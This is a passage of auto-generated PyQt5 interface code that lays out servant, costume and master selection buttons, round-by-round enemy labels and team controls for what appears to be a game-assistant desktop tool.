self.gridLayout_3.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.gridLayout_3.setObjectName("gridLayout_3")
self.label_costume_state_4 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_costume_state_4.sizePolicy().hasHeightForWidth())
self.label_costume_state_4.setSizePolicy(sizePolicy)
self.label_costume_state_4.setMaximumSize(QtCore.QSize(16777215, 28))
self.label_costume_state_4.setObjectName("label_costume_state_4")
self.gridLayout_3.addWidget(self.label_costume_state_4, 4, 4, 1, 1)
self.label_servant_state_2 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_servant_state_2.sizePolicy().hasHeightForWidth())
self.label_servant_state_2.setSizePolicy(sizePolicy)
self.label_servant_state_2.setMinimumSize(QtCore.QSize(110, 65))
self.label_servant_state_2.setMaximumSize(QtCore.QSize(16777215, 65))
self.label_servant_state_2.setObjectName("label_servant_state_2")
self.gridLayout_3.addWidget(self.label_servant_state_2, 2, 1, 1, 1)
self.line_7 = QtWidgets.QFrame(self.groupBox)
self.line_7.setFrameShape(QtWidgets.QFrame.VLine)
self.line_7.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_7.setObjectName("line_7")
self.gridLayout_3.addWidget(self.line_7, 0, 7, 1, 1)
self.label_costume_state_1 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_costume_state_1.sizePolicy().hasHeightForWidth())
self.label_costume_state_1.setSizePolicy(sizePolicy)
self.label_costume_state_1.setMaximumSize(QtCore.QSize(16777212, 28))
self.label_costume_state_1.setObjectName("label_costume_state_1")
self.gridLayout_3.addWidget(self.label_costume_state_1, 4, 0, 1, 1)
self.box_skill_confirm = QtWidgets.QCheckBox(self.groupBox)
self.box_skill_confirm.setObjectName("box_skill_confirm")
self.gridLayout_3.addWidget(self.box_skill_confirm, 4, 8, 1, 1)
self.horizontalLayout_29 = QtWidgets.QHBoxLayout()
self.horizontalLayout_29.setObjectName("horizontalLayout_29")
self.btn_select_servant_5 = QtWidgets.QPushButton(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btn_select_servant_5.sizePolicy().hasHeightForWidth())
self.btn_select_servant_5.setSizePolicy(sizePolicy)
self.btn_select_servant_5.setMinimumSize(QtCore.QSize(92, 100))
self.btn_select_servant_5.setMaximumSize(QtCore.QSize(92, 100))
self.btn_select_servant_5.setText("")
self.btn_select_servant_5.setIconSize(QtCore.QSize(92, 100))
self.btn_select_servant_5.setObjectName("btn_select_servant_5")
self.horizontalLayout_29.addWidget(self.btn_select_servant_5)
self.gridLayout_3.addLayout(self.horizontalLayout_29, 0, 5, 1, 1)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.label = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())
self.label.setSizePolicy(sizePolicy)
self.label.setObjectName("label")
self.horizontalLayout_3.addWidget(self.label)
self.spinbox_required_prob = QtWidgets.QSpinBox(self.groupBox)
self.spinbox_required_prob.setMaximum(100)
self.spinbox_required_prob.setProperty("value", 100)
self.spinbox_required_prob.setObjectName("spinbox_required_prob")
self.horizontalLayout_3.addWidget(self.spinbox_required_prob)
self.gridLayout_3.addLayout(self.horizontalLayout_3, 3, 8, 1, 1)
self.horizontalLayout_24 = QtWidgets.QHBoxLayout()
self.horizontalLayout_24.setObjectName("horizontalLayout_24")
self.btn_select_servant_1 = QtWidgets.QPushButton(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btn_select_servant_1.sizePolicy().hasHeightForWidth())
self.btn_select_servant_1.setSizePolicy(sizePolicy)
self.btn_select_servant_1.setMinimumSize(QtCore.QSize(92, 100))
self.btn_select_servant_1.setMaximumSize(QtCore.QSize(92, 100))
self.btn_select_servant_1.setText("")
self.btn_select_servant_1.setIconSize(QtCore.QSize(92, 100))
self.btn_select_servant_1.setObjectName("btn_select_servant_1")
self.horizontalLayout_24.addWidget(self.btn_select_servant_1)
self.gridLayout_3.addLayout(self.horizontalLayout_24, 0, 0, 1, 1)
self.label_costume_state_5 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_costume_state_5.sizePolicy().hasHeightForWidth())
self.label_costume_state_5.setSizePolicy(sizePolicy)
self.label_costume_state_5.setMaximumSize(QtCore.QSize(16777215, 28))
self.label_costume_state_5.setObjectName("label_costume_state_5")
self.gridLayout_3.addWidget(self.label_costume_state_5, 4, 5, 1, 1)
self.label_costume_state_6 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_costume_state_6.sizePolicy().hasHeightForWidth())
self.label_costume_state_6.setSizePolicy(sizePolicy)
self.label_costume_state_6.setMaximumSize(QtCore.QSize(16777215, 28))
self.label_costume_state_6.setObjectName("label_costume_state_6")
self.gridLayout_3.addWidget(self.label_costume_state_6, 4, 6, 1, 1)
self.horizontalLayout_26 = QtWidgets.QHBoxLayout()
self.horizontalLayout_26.setObjectName("horizontalLayout_26")
self.btn_select_servant_2 = QtWidgets.QPushButton(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btn_select_servant_2.sizePolicy().hasHeightForWidth())
self.btn_select_servant_2.setSizePolicy(sizePolicy)
self.btn_select_servant_2.setMinimumSize(QtCore.QSize(92, 100))
self.btn_select_servant_2.setMaximumSize(QtCore.QSize(92, 100))
self.btn_select_servant_2.setText("")
self.btn_select_servant_2.setIconSize(QtCore.QSize(92, 100))
self.btn_select_servant_2.setObjectName("btn_select_servant_2")
self.horizontalLayout_26.addWidget(self.btn_select_servant_2)
self.gridLayout_3.addLayout(self.horizontalLayout_26, 0, 1, 1, 1)
self.horizontalLayout_23 = QtWidgets.QHBoxLayout()
self.horizontalLayout_23.setObjectName("horizontalLayout_23")
self.btn_select_master = QtWidgets.QPushButton(self.groupBox)
self.btn_select_master.setMinimumSize(QtCore.QSize(92, 100))
self.btn_select_master.setMaximumSize(QtCore.QSize(92, 100))
self.btn_select_master.setText("")
self.btn_select_master.setIconSize(QtCore.QSize(100, 100))
self.btn_select_master.setObjectName("btn_select_master")
self.horizontalLayout_23.addWidget(self.btn_select_master)
self.gridLayout_3.addLayout(self.horizontalLayout_23, 0, 8, 1, 1)
self.label_servant_state_1 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_servant_state_1.sizePolicy().hasHeightForWidth())
self.label_servant_state_1.setSizePolicy(sizePolicy)
self.label_servant_state_1.setMinimumSize(QtCore.QSize(110, 65))
self.label_servant_state_1.setMaximumSize(QtCore.QSize(16777215, 65))
self.label_servant_state_1.setObjectName("label_servant_state_1")
self.gridLayout_3.addWidget(self.label_servant_state_1, 2, 0, 1, 1)
self.label_master_state = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_master_state.sizePolicy().hasHeightForWidth())
self.label_master_state.setSizePolicy(sizePolicy)
self.label_master_state.setMinimumSize(QtCore.QSize(0, 0))
self.label_master_state.setMaximumSize(QtCore.QSize(16777215, 28))
self.label_master_state.setObjectName("label_master_state")
self.gridLayout_3.addWidget(self.label_master_state, 2, 8, 1, 1)
self.horizontalLayout_38 = QtWidgets.QHBoxLayout()
self.horizontalLayout_38.setObjectName("horizontalLayout_38")
self.btn_select_costume_3 = QtWidgets.QPushButton(self.groupBox)
self.btn_select_costume_3.setMinimumSize(QtCore.QSize(100, 45))
self.btn_select_costume_3.setMaximumSize(QtCore.QSize(100, 45))
self.btn_select_costume_3.setText("")
self.btn_select_costume_3.setIconSize(QtCore.QSize(100, 150))
self.btn_select_costume_3.setObjectName("btn_select_costume_3")
self.horizontalLayout_38.addWidget(self.btn_select_costume_3)
self.gridLayout_3.addLayout(self.horizontalLayout_38, 3, 2, 1, 1)
self.label_costume_state_2 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_costume_state_2.sizePolicy().hasHeightForWidth())
self.label_costume_state_2.setSizePolicy(sizePolicy)
self.label_costume_state_2.setMaximumSize(QtCore.QSize(16777215, 28))
self.label_costume_state_2.setObjectName("label_costume_state_2")
self.gridLayout_3.addWidget(self.label_costume_state_2, 4, 1, 1, 1)
self.horizontalLayout_28 = QtWidgets.QHBoxLayout()
self.horizontalLayout_28.setObjectName("horizontalLayout_28")
self.btn_select_servant_4 = QtWidgets.QPushButton(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btn_select_servant_4.sizePolicy().hasHeightForWidth())
self.btn_select_servant_4.setSizePolicy(sizePolicy)
self.btn_select_servant_4.setMinimumSize(QtCore.QSize(92, 100))
self.btn_select_servant_4.setMaximumSize(QtCore.QSize(92, 100))
self.btn_select_servant_4.setText("")
self.btn_select_servant_4.setIconSize(QtCore.QSize(92, 100))
self.btn_select_servant_4.setObjectName("btn_select_servant_4")
self.horizontalLayout_28.addWidget(self.btn_select_servant_4)
self.gridLayout_3.addLayout(self.horizontalLayout_28, 0, 4, 1, 1)
self.horizontalLayout_36 = QtWidgets.QHBoxLayout()
self.horizontalLayout_36.setObjectName("horizontalLayout_36")
self.btn_select_costume_2 = QtWidgets.QPushButton(self.groupBox)
self.btn_select_costume_2.setMinimumSize(QtCore.QSize(100, 45))
self.btn_select_costume_2.setMaximumSize(QtCore.QSize(100, 45))
self.btn_select_costume_2.setText("")
self.btn_select_costume_2.setIconSize(QtCore.QSize(100, 150))
self.btn_select_costume_2.setObjectName("btn_select_costume_2")
self.horizontalLayout_36.addWidget(self.btn_select_costume_2)
self.gridLayout_3.addLayout(self.horizontalLayout_36, 3, 1, 1, 1)
self.horizontalLayout_46 = QtWidgets.QHBoxLayout()
self.horizontalLayout_46.setObjectName("horizontalLayout_46")
self.btn_select_costume_1 = QtWidgets.QPushButton(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btn_select_costume_1.sizePolicy().hasHeightForWidth())
self.btn_select_costume_1.setSizePolicy(sizePolicy)
self.btn_select_costume_1.setMinimumSize(QtCore.QSize(100, 45))
self.btn_select_costume_1.setMaximumSize(QtCore.QSize(100, 45))
self.btn_select_costume_1.setText("")
self.btn_select_costume_1.setIconSize(QtCore.QSize(100, 150))
self.btn_select_costume_1.setObjectName("btn_select_costume_1")
self.horizontalLayout_46.addWidget(self.btn_select_costume_1)
self.gridLayout_3.addLayout(self.horizontalLayout_46, 3, 0, 1, 1)
self.label_servant_state_3 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_servant_state_3.sizePolicy().hasHeightForWidth())
self.label_servant_state_3.setSizePolicy(sizePolicy)
self.label_servant_state_3.setMinimumSize(QtCore.QSize(110, 65))
self.label_servant_state_3.setMaximumSize(QtCore.QSize(16777215, 65))
self.label_servant_state_3.setObjectName("label_servant_state_3")
self.gridLayout_3.addWidget(self.label_servant_state_3, 2, 2, 1, 1)
self.label_servant_state_5 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_servant_state_5.sizePolicy().hasHeightForWidth())
self.label_servant_state_5.setSizePolicy(sizePolicy)
self.label_servant_state_5.setMinimumSize(QtCore.QSize(110, 65))
self.label_servant_state_5.setMaximumSize(QtCore.QSize(16777215, 65))
self.label_servant_state_5.setObjectName("label_servant_state_5")
self.gridLayout_3.addWidget(self.label_servant_state_5, 2, 5, 1, 1)
self.horizontalLayout_44 = QtWidgets.QHBoxLayout()
self.horizontalLayout_44.setObjectName("horizontalLayout_44")
self.btn_select_costume_6 = QtWidgets.QPushButton(self.groupBox)
self.btn_select_costume_6.setMinimumSize(QtCore.QSize(100, 45))
self.btn_select_costume_6.setMaximumSize(QtCore.QSize(100, 45))
self.btn_select_costume_6.setText("")
self.btn_select_costume_6.setIconSize(QtCore.QSize(100, 150))
self.btn_select_costume_6.setObjectName("btn_select_costume_6")
self.horizontalLayout_44.addWidget(self.btn_select_costume_6)
self.gridLayout_3.addLayout(self.horizontalLayout_44, 3, 6, 1, 1)
self.horizontalLayout_27 = QtWidgets.QHBoxLayout()
self.horizontalLayout_27.setObjectName("horizontalLayout_27")
self.btn_select_servant_3 = QtWidgets.QPushButton(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btn_select_servant_3.sizePolicy().hasHeightForWidth())
self.btn_select_servant_3.setSizePolicy(sizePolicy)
self.btn_select_servant_3.setMinimumSize(QtCore.QSize(92, 100))
self.btn_select_servant_3.setMaximumSize(QtCore.QSize(92, 100))
self.btn_select_servant_3.setText("")
self.btn_select_servant_3.setIconSize(QtCore.QSize(92, 100))
self.btn_select_servant_3.setObjectName("btn_select_servant_3")
self.horizontalLayout_27.addWidget(self.btn_select_servant_3)
self.gridLayout_3.addLayout(self.horizontalLayout_27, 0, 2, 1, 1)
self.label_costume_state_3 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_costume_state_3.sizePolicy().hasHeightForWidth())
self.label_costume_state_3.setSizePolicy(sizePolicy)
self.label_costume_state_3.setMaximumSize(QtCore.QSize(16777215, 28))
self.label_costume_state_3.setObjectName("label_costume_state_3")
self.gridLayout_3.addWidget(self.label_costume_state_3, 4, 2, 1, 1)
self.label_servant_state_4 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_servant_state_4.sizePolicy().hasHeightForWidth())
self.label_servant_state_4.setSizePolicy(sizePolicy)
self.label_servant_state_4.setMinimumSize(QtCore.QSize(110, 65))
self.label_servant_state_4.setMaximumSize(QtCore.QSize(16777215, 65))
self.label_servant_state_4.setObjectName("label_servant_state_4")
self.gridLayout_3.addWidget(self.label_servant_state_4, 2, 4, 1, 1)
self.line_8 = QtWidgets.QFrame(self.groupBox)
self.line_8.setFrameShape(QtWidgets.QFrame.VLine)
self.line_8.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_8.setObjectName("line_8")
self.gridLayout_3.addWidget(self.line_8, 3, 7, 1, 1)
self.horizontalLayout_40 = QtWidgets.QHBoxLayout()
self.horizontalLayout_40.setObjectName("horizontalLayout_40")
self.btn_select_costume_4 = QtWidgets.QPushButton(self.groupBox)
self.btn_select_costume_4.setMinimumSize(QtCore.QSize(100, 45))
self.btn_select_costume_4.setMaximumSize(QtCore.QSize(100, 45))
self.btn_select_costume_4.setText("")
self.btn_select_costume_4.setIconSize(QtCore.QSize(100, 150))
self.btn_select_costume_4.setObjectName("btn_select_costume_4")
self.horizontalLayout_40.addWidget(self.btn_select_costume_4)
self.gridLayout_3.addLayout(self.horizontalLayout_40, 3, 4, 1, 1)
self.label_servant_state_6 = QtWidgets.QLabel(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_servant_state_6.sizePolicy().hasHeightForWidth())
self.label_servant_state_6.setSizePolicy(sizePolicy)
self.label_servant_state_6.setMinimumSize(QtCore.QSize(110, 65))
self.label_servant_state_6.setMaximumSize(QtCore.QSize(16777215, 65))
self.label_servant_state_6.setObjectName("label_servant_state_6")
self.gridLayout_3.addWidget(self.label_servant_state_6, 2, 6, 1, 1)
self.line_3 = QtWidgets.QFrame(self.groupBox)
self.line_3.setFrameShape(QtWidgets.QFrame.VLine)
self.line_3.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_3.setObjectName("line_3")
self.gridLayout_3.addWidget(self.line_3, 0, 3, 1, 1)
self.horizontalLayout_42 = QtWidgets.QHBoxLayout()
self.horizontalLayout_42.setObjectName("horizontalLayout_42")
self.btn_select_costume_5 = QtWidgets.QPushButton(self.groupBox)
self.btn_select_costume_5.setMinimumSize(QtCore.QSize(100, 45))
self.btn_select_costume_5.setMaximumSize(QtCore.QSize(100, 45))
self.btn_select_costume_5.setText("")
self.btn_select_costume_5.setIconSize(QtCore.QSize(100, 150))
self.btn_select_costume_5.setObjectName("btn_select_costume_5")
self.horizontalLayout_42.addWidget(self.btn_select_costume_5)
self.gridLayout_3.addLayout(self.horizontalLayout_42, 3, 5, 1, 1)
self.horizontalLayout_30 = QtWidgets.QHBoxLayout()
self.horizontalLayout_30.setObjectName("horizontalLayout_30")
self.btn_select_servant_6 = QtWidgets.QPushButton(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btn_select_servant_6.sizePolicy().hasHeightForWidth())
self.btn_select_servant_6.setSizePolicy(sizePolicy)
self.btn_select_servant_6.setMinimumSize(QtCore.QSize(92, 100))
self.btn_select_servant_6.setMaximumSize(QtCore.QSize(92, 100))
self.btn_select_servant_6.setText("")
self.btn_select_servant_6.setIconSize(QtCore.QSize(92, 100))
self.btn_select_servant_6.setObjectName("btn_select_servant_6")
self.horizontalLayout_30.addWidget(self.btn_select_servant_6)
self.gridLayout_3.addLayout(self.horizontalLayout_30, 0, 6, 1, 1)
self.line_4 = QtWidgets.QFrame(self.groupBox)
self.line_4.setFrameShape(QtWidgets.QFrame.VLine)
self.line_4.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_4.setObjectName("line_4")
self.gridLayout_3.addWidget(self.line_4, 3, 3, 1, 1)
self.verticalLayout_3.addLayout(self.gridLayout_3)
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.btn_set_progress = QtWidgets.QPushButton(self.groupBox)
self.btn_set_progress.setObjectName("btn_set_progress")
self.horizontalLayout_4.addWidget(self.btn_set_progress)
self.btn_choose_level = QtWidgets.QPushButton(self.groupBox)
self.btn_choose_level.setObjectName("btn_choose_level")
self.horizontalLayout_4.addWidget(self.btn_choose_level)
self.btn_confirm_team = QtWidgets.QPushButton(self.groupBox)
self.btn_confirm_team.setObjectName("btn_confirm_team")
self.horizontalLayout_4.addWidget(self.btn_confirm_team)
self.btn_change_team = QtWidgets.QPushButton(self.groupBox)
self.btn_change_team.setEnabled(False)
self.btn_change_team.setObjectName("btn_change_team")
self.horizontalLayout_4.addWidget(self.btn_change_team)
self.btn_round_reset = QtWidgets.QPushButton(self.groupBox)
self.btn_round_reset.setEnabled(False)
self.btn_round_reset.setObjectName("btn_round_reset")
self.horizontalLayout_4.addWidget(self.btn_round_reset)
self.verticalLayout_3.addLayout(self.horizontalLayout_4)
self.verticalLayout_2.addWidget(self.groupBox)
self.horizontalLayout_15 = QtWidgets.QHBoxLayout()
self.horizontalLayout_15.setObjectName("horizontalLayout_15")
self.groupBox_2 = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_2.setTitle("")
self.groupBox_2.setObjectName("groupBox_2")
self.verticalLayout_6 = QtWidgets.QVBoxLayout(self.groupBox_2)
self.verticalLayout_6.setContentsMargins(5, 5, 5, 5)
self.verticalLayout_6.setSpacing(5)
self.verticalLayout_6.setObjectName("verticalLayout_6")
self.verticalLayout_4 = QtWidgets.QVBoxLayout()
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.gridLayout_7 = QtWidgets.QGridLayout()
self.gridLayout_7.setObjectName("gridLayout_7")
self.round1_enemy3_class = QtWidgets.QLabel(self.groupBox_2)
self.round1_enemy3_class.setMinimumSize(QtCore.QSize(150, 0))
self.round1_enemy3_class.setMaximumSize(QtCore.QSize(150, 16777215))
self.round1_enemy3_class.setText("")
self.round1_enemy3_class.setObjectName("round1_enemy3_class")
self.gridLayout_7.addWidget(self.round1_enemy3_class, 1, 0, 1, 1)
self.round3_enemy1_class = QtWidgets.QLabel(self.groupBox_2)
self.round3_enemy1_class.setMinimumSize(QtCore.QSize(150, 0))
self.round3_enemy1_class.setMaximumSize(QtCore.QSize(150, 16777215))
self.round3_enemy1_class.setText("")
self.round3_enemy1_class.setObjectName("round3_enemy1_class")
self.gridLayout_7.addWidget(self.round3_enemy1_class, 7, 2, 1, 1)
self.horizontalLayout_10 = QtWidgets.QHBoxLayout()
self.horizontalLayout_10.setObjectName("horizontalLayout_10")
self.round2_enemy1_pic = QtWidgets.QPushButton(self.groupBox_2)
self.round2_enemy1_pic.setEnabled(False)
self.round2_enemy1_pic.setMinimumSize(QtCore.QSize(64, 64))
self.round2_enemy1_pic.setMaximumSize(QtCore.QSize(64, 64))
self.round2_enemy1_pic.setText("")
self.round2_enemy1_pic.setIconSize(QtCore.QSize(64, 64))
self.round2_enemy1_pic.setObjectName("round2_enemy1_pic")
self.horizontalLayout_10.addWidget(self.round2_enemy1_pic)
self.gridLayout_7.addLayout(self.horizontalLayout_10, 3, 2, 1, 1)
self.round3_enemy1_health = QtWidgets.QLabel(self.groupBox_2)
self.round3_enemy1_health.setMinimumSize(QtCore.QSize(150, 0))
self.round3_enemy1_health.setMaximumSize(QtCore.QSize(150, 16777215))
self.round3_enemy1_health.setText("")
self.round3_enemy1_health.setObjectName("round3_enemy1_health")
self.gridLayout_7.addWidget(self.round3_enemy1_health, 8, 2, 1, 1)
self.horizontalLayout_20 = QtWidgets.QHBoxLayout()
self.horizontalLayout_20.setObjectName("horizontalLayout_20")
self.round3_enemy2_pic = QtWidgets.QPushButton(self.groupBox_2)
self.round3_enemy2_pic.setEnabled(False)
self.round3_enemy2_pic.setMinimumSize(QtCore.QSize(64, 64))
self.round3_enemy2_pic.setMaximumSize(QtCore.QSize(64, 64))
self.round3_enemy2_pic.setText("")
self.round3_enemy2_pic.setIconSize(QtCore.QSize(64, 64))
self.round3_enemy2_pic.setObjectName("round3_enemy2_pic")
self.horizontalLayout_20.addWidget(self.round3_enemy2_pic)
self.gridLayout_7.addLayout(self.horizontalLayout_20, 6, 1, 1, 1)
self.round2_enemy3_class = QtWidgets.QLabel(self.groupBox_2)
self.round2_enemy3_class.setMinimumSize(QtCore.QSize(150, 0))
self.round2_enemy3_class.setMaximumSize(QtCore.QSize(150, 16777215))
self.round2_enemy3_class.setText("")
self.round2_enemy3_class.setObjectName("round2_enemy3_class")
self.gridLayout_7.addWidget(self.round2_enemy3_class, 4, 0, 1, 1)
self.round2_enemy2_class = QtWidgets.QLabel(self.groupBox_2)
self.round2_enemy2_class.setMinimumSize(QtCore.QSize(150, 0))
self.round2_enemy2_class.setMaximumSize(QtCore.QSize(150, 16777215))
self.round2_enemy2_class.setText("")
self.round2_enemy2_class.setObjectName("round2_enemy2_class")
self.gridLayout_7.addWidget(self.round2_enemy2_class, 4, 1, 1, 1)
self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.round2_enemy3_pic = QtWidgets.QPushButton(self.groupBox_2)
self.round2_enemy3_pic.setEnabled(False)
self.round2_enemy3_pic.setMinimumSize(QtCore.QSize(64, 64))
self.round2_enemy3_pic.setMaximumSize(QtCore.QSize(64, 64))
self.round2_enemy3_pic.setText("")
self.round2_enemy3_pic.setIconSize(QtCore.QSize(64, 64))
self.round2_enemy3_pic.setObjectName("round2_enemy3_pic")
self.horizontalLayout_6.addWidget(self.round2_enemy3_pic)
self.gridLayout_7.addLayout(self.horizontalLayout_6, 3, 0, 1, 1)
self.horizontalLayout_7 = QtWidgets.QHBoxLayout()
self.horizontalLayout_7.setObjectName("horizontalLayout_7")
self.round2_enemy2_pic = QtWidgets.QPushButton(self.groupBox_2)
self.round2_enemy2_pic.setEnabled(False)
self.round2_enemy2_pic.setMinimumSize(QtCore.QSize(64, 64))
self.round2_enemy2_pic.setMaximumSize(QtCore.QSize(64, 64))
self.round2_enemy2_pic.setText("")
self.round2_enemy2_pic.setIconSize(QtCore.QSize(64, 64))
self.round2_enemy2_pic.setObjectName("round2_enemy2_pic")
self.horizontalLayout_7.addWidget(self.round2_enemy2_pic)
self.gridLayout_7.addLayout(self.horizontalLayout_7, 3, 1, 1, 1)
self.horizontalLayout_21 = QtWidgets.QHBoxLayout()
self.horizontalLayout_21.setObjectName("horizontalLayout_21")
self.round3_enemy3_pic = QtWidgets.QPushButton(self.groupBox_2)
self.round3_enemy3_pic.setEnabled(False)
self.round3_enemy3_pic.setMinimumSize(QtCore.QSize(64, 64))
self.round3_enemy3_pic.setMaximumSize(QtCore.QSize(64, 64))
self.round3_enemy3_pic.setText("")
self.round3_enemy3_pic.setIconSize(QtCore.QSize(64, 64))
self.round3_enemy3_pic.setObjectName("round3_enemy3_pic")
self.horizontalLayout_21.addWidget(self.round3_enemy3_pic)
self.gridLayout_7.addLayout(self.horizontalLayout_21, 6, 0, 1, 1)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.round1_enemy2_pic = QtWidgets.QPushButton(self.groupBox_2)
self.round1_enemy2_pic.setEnabled(False)
self.round1_enemy2_pic.setMinimumSize(QtCore.QSize(64, 64))
self.round1_enemy2_pic.setMaximumSize(QtCore.QSize(64, 64))
self.round1_enemy2_pic.setText("")
self.round1_enemy2_pic.setIconSize(QtCore.QSize(64, 64))
self.round1_enemy2_pic.setObjectName("round1_enemy2_pic")
self.horizontalLayout_2.addWidget(self.round1_enemy2_pic)
self.gridLayout_7.addLayout(self.horizontalLayout_2, 0, 1, 1, 1)
self.round3_enemy3_class = QtWidgets.QLabel(self.groupBox_2)
self.round3_enemy3_class.setMinimumSize(QtCore.QSize(150, 0))
self.round3_enemy3_class.setMaximumSize(QtCore.QSize(150, 28))
self.round3_enemy3_class.setText("")
self.round3_enemy3_class.setObjectName("round3_enemy3_class")
self.gridLayout_7.addWidget(self.round3_enemy3_class, 7, 0, 1, 1)
self.round1_enemy2_class = QtWidgets.QLabel(self.groupBox_2)
self.round1_enemy2_class.setMinimumSize(QtCore.QSize(150, 0))
self.round1_enemy2_class.setMaximumSize(QtCore.QSize(150, 28))
self.round1_enemy2_class.setText("")
self.round1_enemy2_class.setObjectName("round1_enemy2_class")
